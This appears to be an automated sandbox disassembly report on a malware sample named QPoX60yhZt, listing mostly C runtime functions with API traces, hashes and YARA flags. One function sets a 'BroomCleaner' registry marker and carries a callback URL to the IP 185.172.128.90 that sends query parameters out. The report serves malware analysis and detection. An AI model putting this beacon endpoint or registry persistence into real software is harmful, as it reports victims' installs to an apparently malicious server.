
__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: 63e05c14b460d685efbaffe237daf51259fe89ad88eb658e1c08f97622123781
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05BF1417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BF141C
std::_Lockit::_Lockit.LIBCPMT ref: 05BF142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05BF146B

Part of subcall function 05BF80E1: _Yarn.LIBCPMT ref: 05BF8100
Part of subcall function 05BF80E1: _Yarn.LIBCPMT ref: 05BF8124

std::bad_exception::bad_exception.LIBCMT ref: 05BF148C
__CxxThrowException@8.LIBVCRUNTIME ref: 05BF149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05BF14BD
std::_Lockit::~_Lockit.LIBCPMT ref: 05BF152E

Strings

n~B, xrefs: 05BF1417

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: 0d09ddb48206b0d55afa3df9f034ccb636aec86a90567ff129b9f1b63e08958e
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 59317E72904B40DFC7319F29D84465AFBF5FF48610B608A6FE19A92A80CB74B605DF58

Uniqueness

Uniqueness Score: -1.00%

Function 05C09514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: eb3713a4ae27f53f827cf7c30b0cc0479c1b5d4dee4b31f109f9957ae204cfff
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: 2EC1C075A08249AFDF11DFACC888BBDBBB5BF09310F086995D541A73E2C7309A41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 05C04CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05C06F80: GetLastError.KERNEL32(?,?,05BFE697,?,?,?,05BFED94,?), ref: 05C06F84
Part of subcall function 05C06F80: _free.LIBCMT ref: 05C06FB7
Part of subcall function 05C06F80: SetLastError.KERNEL32(00000000), ref: 05C06FF8
Part of subcall function 05C06F80: _abort.LIBCMT ref: 05C06FFE

_memcmp.LIBVCRUNTIME ref: 05C04F5B
_free.LIBCMT ref: 05C04FCC
_free.LIBCMT ref: 05C04FE5
_free.LIBCMT ref: 05C05017
_free.LIBCMT ref: 05C05020
_free.LIBCMT ref: 05C0502C

Strings

C, xrefs: 05C04E19

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: ebb14dab17c3327028e97b6b32a090aea9dfec1a0465ac1ab9325587644cd0d7
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: 8AB13B75A012199FDF28DF18C888AAEB7B5FF48304F5059EAD949A7390D735AE90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

B, xrefs: 0041461F
|B, xrefs: 004146B1

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 05C0F03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05C0F0AD
_free.LIBCMT ref: 05C0F0BB
_free.LIBCMT ref: 05C0F1E9
_free.LIBCMT ref: 05C0F1F4

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: 4f1e70f44c94cf804a1af79abd0979f00752072fdb7907f306d4b7856394e0f1
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 1D61B475A04205AFDB30DFA4C840BAABBF5FF44710F14596AD945EB2C1DB70AA81DF90

Uniqueness

Uniqueness Score: -1.00%

Function 05C04833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05C07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05C07CDE

_free.LIBCMT ref: 05C0493E
_free.LIBCMT ref: 05C04955
_free.LIBCMT ref: 05C04974
_free.LIBCMT ref: 05C0498F
_free.LIBCMT ref: 05C049A6

Strings

B, xrefs: 05C04886

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: 30112a645e70e362617d9f4e93065a1a0a850906b84c5948510a25906a27f864
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: 1451B531A00704AFDF28DF69D880A6B77F9FF44720B141969E64ADB290E731EA11DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction ID: 93abb8da7f4b1ee22325e29d014a78f54aaad6af2ae94e442d530b7aeff6bc03
Opcode Fuzzy Hash: 33e6fd75adb2b88f79627ef58a13688fd909e2cfbbaa5c9d8ec04a3e685d9078
Instruction Fuzzy Hash: 7851E6B0A04609DFDB10CFA8D881BEEBBF4EF49310F14416BE955E7251D774A981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 05C05C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05C063EF,?,?,?,?,?,?), ref: 05C05CBC
__fassign.LIBCMT ref: 05C05D37
__fassign.LIBCMT ref: 05C05D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05C05D78
WriteFile.KERNEL32(?,?,00000000,05C063EF,00000000,?,?,?,?,?,?,?,?,?,05C063EF,?), ref: 05C05D97
WriteFile.KERNEL32(?,?,00000001,05C063EF,00000000,?,?,?,?,?,?,?,?,?,05C063EF,?), ref: 05C05DD0

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: 9bd0e51cab2efd2581e258483d7f5a692799187653cd4df9435231c7cb548ee8
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: 9851E470A00249AFDB20CFA8D885BEEBBF8FF08300F14546AE591E7290D7349951CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 05C163C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05C163C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05C163EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05C16471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05C16492

Strings

SOFTWARE\BroomCleaner, xrefs: 05C163CE, 05C163E1
Installed, xrefs: 05C163D0, 05C163FE, 05C1641D, 05C1641E

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 5efb3b8168049ad8985d250b604e5852be4085c331bea9535ccb3ad96150b4b0
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: 5731A771A00219EEDB04DFA8CC84AFEBB79FB09304F04056EE902B3241C7711E46CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 05C0F513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05C0F25A: _free.LIBCMT ref: 05C0F283

_free.LIBCMT ref: 05C0F561

Part of subcall function 05C06501: HeapFree.KERNEL32(00000000,00000000,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?), ref: 05C06517
Part of subcall function 05C06501: GetLastError.KERNEL32(?,?,05C0F288,?,00000000,?,00000000,?,05C0F52C,?,00000007,?,?,05C0F920,?,?), ref: 05C06529

_free.LIBCMT ref: 05C0F56C
_free.LIBCMT ref: 05C0F577
_free.LIBCMT ref: 05C0F5CB
_free.LIBCMT ref: 05C0F5D6
_free.LIBCMT ref: 05C0F5E1
_free.LIBCMT ref: 05C0F5EC

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: ef3e6aa20e772f519911904c1b0b89d5e6e1992c85f5e499bb87a9def6145793
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 2C118472640B04AAEA31BBB0CC4EFCB7B9D6F44B00F401D18A69A660D0DA39F594AA51

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 05BF43F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05BF43F5
std::_Lockit::_Lockit.LIBCPMT ref: 05BF4404
int.LIBCPMT ref: 05BF441B

Part of subcall function 05BF157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BF1590
Part of subcall function 05BF157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BF15AA

std::locale::_Getfacet.LIBCPMT ref: 05BF4424
std::_Facet_Register.LIBCPMT ref: 05BF4455
std::_Lockit::~_Lockit.LIBCPMT ref: 05BF446B
__CxxThrowException@8.LIBVCRUNTIME ref: 05BF4491

Memory Dump Source

Source File: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_QPoX60yhZt.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: 0f1cd9f9b0d5f11c0bfb405c0cc7377933386aa9e362beb1249a4a409da08e55
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: 4A110472A001189BCF04EBA8D809AEEB775FF84210F1445DAEA15B7290DF34AA09C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.1987436384.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QPoX60yhZt.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
